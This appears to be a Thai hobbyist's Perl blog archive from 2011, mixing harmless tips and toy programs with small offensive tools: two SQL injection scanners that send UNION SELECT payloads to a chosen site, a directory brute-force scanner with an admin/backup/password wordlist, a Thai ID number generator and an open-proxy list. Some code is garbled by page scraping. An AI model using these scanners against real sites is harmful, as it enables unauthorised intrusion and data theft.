ลิงก์ผู้สนับสนุน

วันอังคารที่ 20 ธันวาคม พ.ศ. 2554

[Perl] Search free anonymous proxy


#[Perl] Search free anonymous proxy
#Pastebin : http://pastebin.com/eqTWiNTz


#For : หาพร๊อกซี่ไว้ใช้งานฟรีๆละครับ แต่ลิสต์พร๊อกซี่ที่ได้ ก็ยังใช้ไม่ 100% เลย TT แต่ก็ยังดีว้า

use LWP::UserAgent;
$agent=LWP::UserAgent->new;
$agent->agent('Mozilla/8.0');
$agent->max_redirect(0);
$agent->timeout(5);

$content=$agent->get('http://www.proxylists.net/http.txt')->content;
print 'Checking http://www.proxylists.net/http.txt...';
print "\n";
$content=~s/\r//g;
open FILE,">proxylists.net_http.txt";
print FILE $content;
close FILE;

$content=$agent->get('http://www.proxylists.net/http_highanon.txt')->content;
print 'Checking http://www.proxylists.net/http_highanon.txt...';
print "\n";
$content=~s/\r//g;
open FILE,">proxylists.net_http_highanon.txt";
print FILE $content;
close FILE;

open PROXY,"proxylists.net_http.txt";
@proxy=;
close PROXY;

open PROXY,"proxylists.net_http_highanon.txt";
push(@proxy,);
close PROXY;

print 'Found all proxy... ',scalar(@proxy),"\n\n";;

foreach $z (@proxy) {
chomp($z);
($ip,$port)=split(/:/,$z);
$agent->proxy(['http'], 'http://'.$z.'/');
$content=$agent->get('http://www.opkwin.com/whatismyip.php')->content;
if ($content=~/^500/) {
print "$z Noop !!!\n";
}
elsif ($content=~/$ip/) {
print "$z Is OK...\n";
open(LOG,">>proxylists.net_available.txt");
print LOG "$z\n";
close(LOG);
}
else {
print "$z ERROR : $content\n";
}
}

#Search free proxy !!
#http://comfreedom.blogspot.com

วันพุธที่ 14 ธันวาคม พ.ศ. 2554

[Perl] Facebook photo album download with perl


#[Perl] Facebook photo album download with perl
#Pastebin : http://pastebin.com/MRx8fGuV

#Usage : ' perl filename.pl username password album_url '


use LWP::UserAgent;

use HTTP::Cookies;

$user=(shift or 'email@fb_download.com');
$pass=(shift or 'password');
$album=(shift or 'http://www.facebook.com/media/set/?set=a.529237716211.2047231.4&type=3');

$cookie_jar=HTTP::Cookies->new(autosave=>1, hide_cookie2=>1);
$agent=LWP::UserAgent->new(
agent => 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16',
timeout => 5,
max_redirect => 0,
cookie_jar => $cookie_jar
);
$login=$agent->get('http://www.facebook.com/login.php');
$login=$agent->post('https://www.facebook.com/login.php',
[
'locale' => 'en_US',
'email' => $user,
'pass' => $pass,
'persistent' => 1
]
)->content;

if ($login!~/Incorrect Email|Incorrect username|Please re-enter your password|Cookies Required/i) {
print "Login success...\n";
$album_content=$agent->get($album)->content;
while ($album_content=~/src=(http(.+?).jpg)&/ig) {
print url_decode($1),"\n";
save(url_decode($1));
}
}
else { print "Login failed!!\n"; }


sub url_decode {
my $str=shift;
$str=~s/\%([A-Fa-f0-9]{2})/pack('C', hex($1))/seg;
return $str;
}
sub url_encode {
my $str=shift;
$str=~s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;
return $str;
}
sub save {
$image=shift;
open TXT,">>FB_ablum_download.txt";
print TXT localtime." $image\n";
close TXT;

$saveimage=$agent->get($image)->content;
$image=~s/http:\/\/(.+)\///g;
open IMAGE,">$image";
binmode IMAGE;
print IMAGE $saveimage;
close IMAGE;
}

ฟู่วว ว์..

วันเสาร์ที่ 14 พฤษภาคม พ.ศ. 2554

[Perl] โปรแกรมแก้เกม 24 แต้มพอดีว่า... ว่างจัดครับ 55+

ขอไปโพสไว้ที่ pastebin อีกที : http://pastebin.com/gqx9nGXW

sub solution {
my @num=@_;
my @opr=('+','-','*','/');
my $step;
my $output;
my $exp;
my $a;
my $b;
my $c;
foreach $step (1..8) {                   #loop for order of operator
 foreach $a (0..3) {                   #loop for math operator
 foreach $b (0..3) {                   #loop for math operator
  foreach $c (0..3) {                   #loop for math operator
  if ($step==1||$step==4||$step==6||$step==7) { $output.='('; }
  $output.=$num[0];

  $output.=$opr[$a];
  if ($step==2||$step==3) { $output.='('; }
  $output.=$num[1];
  if ($step==1||$step==6) { $output.=')'; }

  $output.=$opr[$b];
  if ($step==1||$step==5) { $output.='('; }
  $output.=$num[2];
  if ($step==2||$step==4) { $output.=')'; }

  $output.=$opr[$c];
  $output.=$num[3];
  if ($step==1||$step==3||$step==5||$step==7) { $output.=')'; }
  $exp=eval($output);
 
  if ($exp==24) {
   ++$j;
   print "[$j]  ::  $output\n";
  }
  $output='';
  }
 }
 }
}
}

my $a;
my $b;
my $c;
my $d;
my @num;
$j=0;

if ($^O eq 'MSWin32') { system('cls'); }
else { system('clear'); }
print "\n  === [24 Points : Solution] ===\n";
print "  By AssazziN [14/05/2011] \n\n";
print "  Enter number (Ex. 1 3 4 6) : ";
chomp($input=);
($num[0],$num[1],$num[2],$num[3])=$input=~/^(\d)\s(\d)\s(\d)\s(\d)$/;
unless ($num[0]&&$num[1]&&$num[2]&&$num[3]) { print "Format error !"; exit(0); }foreach $a (0..3) {
foreach $b (0..3) {
 if ($b==$a) { next; }
 foreach $c (0..3) {
 if ($c==$a||$c==$b) { next; }
 foreach $d (0..3) {
  if ($d==$a||$d==$b||$d==$c) { next; }
  solution($num[$a],$num[$b],$num[$c],$num[$d]);
 }
 }
}
}
print "Not found solution !!\n" if ($j==0);

## Code Grean Grean By AssazziNเขียนเสร็จก็งงกับตัวเองครับ อ่านแล้วงงงงยังไงไม่รู้ ฮ่าๆๆ

เสริม ภาพประกอบตอนทำครับ ตอนใส่วงเล็บนะ ตรงบรรทัด foreach $step (1..
8) {วันอาทิตย์ที่ 24 เมษายน พ.ศ. 2554

[Perl] โปรแกรมสุ่มเลขบัตร ปชช ไทย (GUI)


เขียนไว้นานละครับ ไฟล์มันอยู่ลึก เพิ่งหาเจอ ตอนนี้ก็ลืมไปหมดละ 55+

ขอโพสไว้ที่ pastebin ด้วยละกัน : http://pastebin.com/UtgRrD1s

use Win32::GUI();

sub makeTSSN {
$id[0]=int(rand(8))+1;
$last=$id[0];
foreach $z (2..12) {
  $id[$z-1]=int(rand(9));
  $tmp[$z-1]=$id[$z-1]*(14-$z);
  $last+=$tmp[$z-1];
}
$last=11-($last%11);
if ($last==11) {
  $last=1;
}
elsif ($last==10) {
  $last=0;
}
$key=join('',@id);
$key.=$last;
#return $key;
return "$id[0]-$id[1]$id[2]$id[3]$id[4]-$id[5]$id[6]$id[7]$id[8]$id[9]-$id[10]$id[11]-$last";
}

$main=Win32::GUI::Window->new(
  -name  => 'Main',
  -width => 350,
  -height => 200,
  -title => "TSSN By AssazziN : 24.11.2010",
);
$main->AddLabel(
  -name => "Text",
  -left => 100,
  -top => 20,
  -width => 150,
  -height => 20,
  -text => "Thai ID Gen : AssazziN",
);
$main->AddTextfield(
  -name  => "TextField",
  -left  => 70,
  -top  => 60,
  -width => 200,
  -height => 25,
  -prompt => "ID Gen : ",
  -text => &makeTSSN,

);
$main->AddButton(
  -name  => 'Button',
  -text  => 'Ok',
  -default => 1,
  -ok   => 1,
  -width  => 60,
  -height => 20,
  -left  => $main->ScaleWidth() - 200,
  -top   => $main->ScaleHeight() - 50,
);


$main->Show();
Win32::GUI::Dialog();
exit(0);
sub Main_Terminate {
  return -1;
}

sub Button_Click {
  #$main->AddLabel(
  #-text => &makeTSSN,
#);
  $main->TextField->Text(&makeTSSN);


  print &makeTSSN,"\n";
  return 0;
}:D

วันเสาร์ที่ 23 เมษายน พ.ศ. 2554

Shellcode Generator


print "shellcode : ";
chomp($data=);
@values=split(undef,$data);
foreach $val (@values) {
print '\x';
print unpack(H8,"$val");
}

--------------------------------------------------------

print "shellcode : ";
chomp($data=);
@data=split(//,$data);
foreach (@data) {
$_=~s/(.)/sprintf("%x",ord($1))/eg;
print "\\x$_";
}

วันอังคารที่ 5 เมษายน พ.ศ. 2554

How to find php.ini on linuxUse this command : find / -name "*php.ini*" to get path php.ini

;D

วันพุธที่ 30 มีนาคม พ.ศ. 2554

ข้อความที่พิมพ์ด้วยมือเพียงข้างเดียว [ไทย]


ข้อความที่พิมพ์ด้วยมือเพียงข้างเดียว [ไทย]
ข้อความต่อไปนี้ คือข้อควาที่สามารถพิมพ์ได้ด้วยมือขวาเพียงข้างเดียว WooW

สามัคคี มีวินัย ใฝ่วิชา

!!!

วันพฤหัสบดีที่ 24 มีนาคม พ.ศ. 2554

Good Free Proxy


Good Free Proxy

14.136.194.138:80
218.14.227.197:3128
201.20.18.165:3128
174.142.104.57:3128
58.150.182.76:8080

วันพุธที่ 23 มีนาคม พ.ศ. 2554

[Perl] แก้ไวรัสซ่อนโฟลเดอร์ใน HandyDrive


พอดีว่าผมเจอไวรัสชนิดหนึ่ง จำชื่อไม่ได้ละ มันจะซ่อนโฟลเดอร์ในแฮนดี้ทั้งหมด แล้วก็สร้างไฟล์ .exe ที่มีชื่อเหมือนกับโฟลเดอร์ที่ซ่อนขึ้นมาแทน ทีนี้ผมลบตัวไวรัสออกหมดละ เหลือแต่จะแก้ให้โฟลเดอร์ที่ถูกซ่อนกลับมายังไง

วิธีการแก้คือ CMD -> เข้าไปในไดร์แฮนดี้ (Ex. cd g:) -> attrib –s –h –r “ชื่อโฟลเดอร์”

แต่ที่นี้ มันมีตั้งหลายโฟลเดอร์นะเออ… จะให้มาพิมพ์ทีละโฟลเดอร์ก็ไม่ไหวละ เลยเขียนโค้ด perl นี้ขึ้นมาใช้งานแทน เพราะไม่รู้วิธีแก้แบบอื่นแล้ว :P

เห้อ โพสใส่ blogger แล้วบางส่วนขาดหาย ขอไปโพสที่ pastebin แทนละกันนะครับ


เออ ถ้าแปลงเป็น .pl เป็น .exe แล้วก็พกใส่แฮนดี้เอาไว้ก็ดีแหะ ถูกซ่อนโฟลเดอร์อีกเมื่อไหร่ ก็ดับเบิ้ลคลิกแก้ได้เลย ;D

วันอาทิตย์ที่ 13 มีนาคม พ.ศ. 2554

ios 4.3 Update


อัพเดตแล้วนะเออ...
อัพจาก 4.2.1 > 4.3 600กว่าเมกฯแน๊ะ
ดีนะยังเป็นของสดอยู่ ไม่ไ้ด้เจล 555+

ปล. เขียนทำไมว่ะ ไร้สาระ แสรด ;P

วันอาทิตย์ที่ 6 มีนาคม พ.ศ. 2554

how to find perl interpreter?


Windows : where perl
Ex. : where perl
C:\Perl\bin\perl.exeLinux : whereis perl
Ex. : whereis perl
perl: /usr/bin/perl /usr/share/man/man1/perl.1.gzBonus : how to find version of perl ?

Windows and Linux : perl -v
Ex. on Windows : perl -v
This is perl 5, version 12, subversion 3 (v5.12.3) built for MSWin32-x86-multi-t
hread
(with 9 registered patches, see perl -V for more detail)

Copyright 1987-2010, Larry Wall

Binary build 1204 [294330] provided by ActiveState http://www.ActiveState.com
Built Feb 9 2011 14:38:22

Perl may be copied only under the terms of either the Artistic License or the
GNU General Public License, which may be found in the Perl 5 source kit.

Complete documentation for Perl, including FAQ lists, should be found on
this system using "man perl" or "perldoc perl". If you have access to the
Internet, point your browser at http://www.perl.org/, the Perl Home Page.Ex. on Linux : perl -v
This is perl, v5.8.8 built for i386-linux-thread-multi

Copyright 1987-2006, Larry Wall

Perl may be copied only under the terms of either the Artistic License or the
GNU General Public License, which may be found in the Perl 5 source kit.

Complete documentation for Perl, including FAQ lists, should be found on
this system using "man perl" or "perldoc perl". If you have access to the
Internet, point your browser at http://www.perl.org/, the Perl Home Page.


;D

วันอาทิตย์ที่ 27 กุมภาพันธ์ พ.ศ. 2554

temporarily e-mail อีเมลล์ชั่วคราว


temporarily e-mail


http://www.webemail.me/ <- Get 6 Hours

http://10minutemail.com/ <- Get 10 Minutes


-O-

วันเสาร์ที่ 26 กุมภาพันธ์ พ.ศ. 2554

วิธีแก้ XP แสดงรายละเอียด GroupPolicy ไม่ครบ


จากที่เคยเข้า run>gpedit.msc [Group Policy] ในวินโดว์ XP แล้วมันแสดงรายละเอียดไม่ครบให้คลิกขวาที่ User Configuration > Administrative Templates เลือก Add/Remove TemplatesAdd ไฟล์ system.adm เข้ามา หรือจะเลือกไฟล์ตัวอื่นด้วยก็ได้ เช่น wmplayer.adm(Windows Media Player") แต่หลักๆคือไฟล์ system.adm

และแล้ว รายละเอียดมันก็มาครบ

...THE END...

วันศุกร์ที่ 25 กุมภาพันธ์ พ.ศ. 2554

[How to] turn off Autorun


Go 2 Registry : HKLM > SOFTWARE > Microsoft > Windows NT > CurrentVersion > IniFileMapping

New Key : Autorun.inf

Edit : (Default) > SYS:DoesNotExist

วันพฤหัสบดีที่ 24 กุมภาพันธ์ พ.ศ. 2554

[Perl] การอ่านค่า arguments ตอนเปิดไฟล์


เวลาเราเรียกใช้ perl เนี่ย บางทีเราอาจจะอยากส่งค่าบางอย่างไปตอนแรกเลย เช่น พิมพ์ :
perl xxx.pl test

ทีนี้ถ้าเราจะค่าอ่านข้อความ test ที่ส่งไปละ :
### xxx.pl ###
print $ARGV[0];
#Output : test

หรืออีกวิธีนึง
### xxx.pl ###
$a=shift;
print $a;
#Output : test

แล้วถ้าเราส่งค่าไปหลายตัว เช่น perl xxx.pl test1 test2 hahaha :
### xxx.pl ###
print "$ARGV[0] $ARGV[1] $ARGV[2]";
#Output : test1 test2 hahaha

วันพุธที่ 23 กุมภาพันธ์ พ.ศ. 2554

[Perl] Comment หลายบรรทัด


ปกติเขียน perl ก็ใช้ แต่
# ข้อความ
เป็นการใช้ # นำหน้าบรรทัดที่จะ comment แต่มันก็ทำได้แค่บรรทัดเีดียว

แต่ถ้าจะ comment หลายบรรทัดละ

=pod
...
...บรรทัดนี้ บ่ได้เอาไปแปลด้วยดอก
...
=cut

ก็จะใช้ =pod , =cut คร่อมเอาไว้

Reference : http://perldoc.perl.org/perlpod.html

นอนละ zzZZ

วันอาทิตย์ที่ 13 กุมภาพันธ์ พ.ศ. 2554

ที่มาของคำว่า ไสหัวไป


พอดีว่าไปเจอมาเวปไหนไม่รู้ พอมา search ใน google ว่า "ที่มาของคำว่า ไสหัวไป" ก็เจอเกลื่อนเลย ฮ่าๆๆ
เลยเอามาประดับบล็อกมั่ง ดูกี่ทีก็ขำ 555+วันพุธที่ 9 กุมภาพันธ์ พ.ศ. 2554

[Perl] SQL Scan #2


SQL Scan แบบนี้ คาดว่าน่าจะใช้ได้ดีกว่าแบบเดิมอยู่นะ
ดูโค้ดดีๆนะครับ เพราะตรงข้อความไหนที่มีเครื่องหมาย 'มากกว่า' หรือ 'น้อยกว่า' อยู่มันจะไม่ติด ก็ให้ไปดูโค้ดเอาใน pastebin เอาละกัน

SOURCE CODE : http://pastebin.com/MyH0kj0a

## SQL Scan #2 ##
use LWP::UserAgent;
print "SQL Injection\n[+] Target \"www.xxx.xxx/index.php?id=\" = ";
chomp($target=);
@target=split(//,$target);
while ($target[$#target]=~/[0-9]/ || $target[$#target]=~/-/) {
pop(@target);
}
$target=join('',@target);
unless ($target=~/^http:\/\//) {
$target='http://'.$target;
}
print "[+] Scan ",$target,"\n";
$target.="-1+UNION+SELECT+1";
$oritarget=$target;
chop($oritarget);
print "[] Scan : 1\n";
$agent=LWP::UserAgent->new;
SCAN : for ($i=2;$i<50 i="">
$content=$agent->get($target)->content;
unless ($content=~/Warning/) {
print "[+] Found : $target";
last SCAN;
}
print "[] Scan : ",$i,"\n";
$target=$target.",".$i;
}
print "[-] Not found";

วันอาทิตย์ที่ 6 กุมภาพันธ์ พ.ศ. 2554

New Theme *0*วู้.. เปลี่ยนธีมบล็อกใหม่ ดูสดใสขึ้นเยอะเลย

ว่าแต่มันจะดูแสบตาเกินไปมั้ยเนี่ย -^-

[Perl] SQL Scan


ได้เขียน scan dir ไปละ เขียน scan sql ต่อเลยละกัน เอิ๊กๆ


SOURCE CODE : http://pastebin.com/TdbdnUJM

## SQL SCAN##
use LWP::UserAgent;
print "SQL Injection\n[+] Target \"www.xxx.xxx/index?id=\" = ";
chomp($target=);
unless ($target=~/^http:\/\//) {
$target='http://'.$target;
}
$sql="1+order+by+";
print "[+] Scan column in ",$target,"\n";
$agent=LWP::UserAgent->new;
for ($i=1;$i<=50;++$i) {
print "[] Scan : ",$i-1,"\n";
$bug=$target.$sql.$i;
$response=$agent->get($bug);
$content=$response->content;
if ($content=~m/Warning/ig) {
$i-=1;
$bug=$target.$sql.$i;
print "[+] Found : ",$bug,"\n";
$ex=$target."1+and+1=0+union+select+1";
for ($j=2;$j<=$i;++$j) {
$ex=$ex.",".$j;
}
print "[+] Found : ",$ex;
exit;
}
}
print "[-] Not Found";

[Perl] Scan Directory


ว่าจะได้ลองทดสอบ SyntaxHighlight ไปด้วย แต่ลองแล้วไม่ติด - -"
ช่างมัน ค่อยไปโพสใส่ pastebin อีกทีก็ได้ว้า...

SOURCE CODE : http://pastebin.com/ACYeXFis

## Perl Scan Directory ##
use LWP::UserAgent;
print "Scan Directory\n[+] Target \"www.xxx.xxx\" : ";
chomp($domain=);
unless ($domain=~/http:\/\//) {
$domain='http://'.$domain;
}
print "Scan Directory : ",$domain,"\n";
$agent=LWP::UserAgent->new;
$agent->max_redirect(0);
open(FILE,"dir.txt");
@dir=;
close(FILE);
foreach (@dir) {
chomp;
$url=$domain.'/'.$_;
$response=$agent->head($url);
print "[] Scan : $url";
unless ($response->status_line=~/^404|^302/) {
print " ..... ",$response->status_line;
}
print "\n";
}


## dir.txt ##
0
1
12123
123
9
admin
administrator
administrators
back
backup
backups
backupz
etc
file
files
front
image
images
index
ip
list
lists
log
logfile
logfiles
login
more
new folder
new folders
old
pwd
pwds
password
password
root
roots
test
tesetz
text
texts
txt
secret
source
sources
web
webmaster
webmasters
z
zecret


วันอาทิตย์ที่ 30 มกราคม พ.ศ. 2554

Virus Facebook ?


โอ๊ะโอ ไวรัส Facebook อีกรึป่าวนี่ มีมาเป็นระลอกๆ หึหึ

Picture ) http://apps.facebook.com/photogirls/photo.php?="อีเมลล์เรา"


ว่าแล้ว ขอลองกดลิงค์ดูหน่อยแล้วกันนะ เอิ๊กๆ
เป็นยังไงเดี๋ยวค่อยมาเขียนต่อ...

วันอาทิตย์ที่ 16 มกราคม พ.ศ. 2554

นี่เอ็งโหลดอะไรไป - -"


พอดีว่าผมเซฟเวปเวปหนึ่ง แล้วมันเป็นยังงี้ ประมาณว่ามันโหลดเกินขนาดไฟล์ ความเร็วมันก็เลยติดลบ -*-
่แล้วไหงเลยขนาดไฟล์หลังโหลดเสร็จเป็น 277KB แต่ขนาดไฟล์ตามภาพบนเป็น 29KB (แต่ตูโหลดได้ถึง 1.1MB แล้วนะเฟ้ย ฮ่าๆๆ)เอามาให้ดูขำๆครับ ไม่อะไรมาก เอิ๊กๆๆ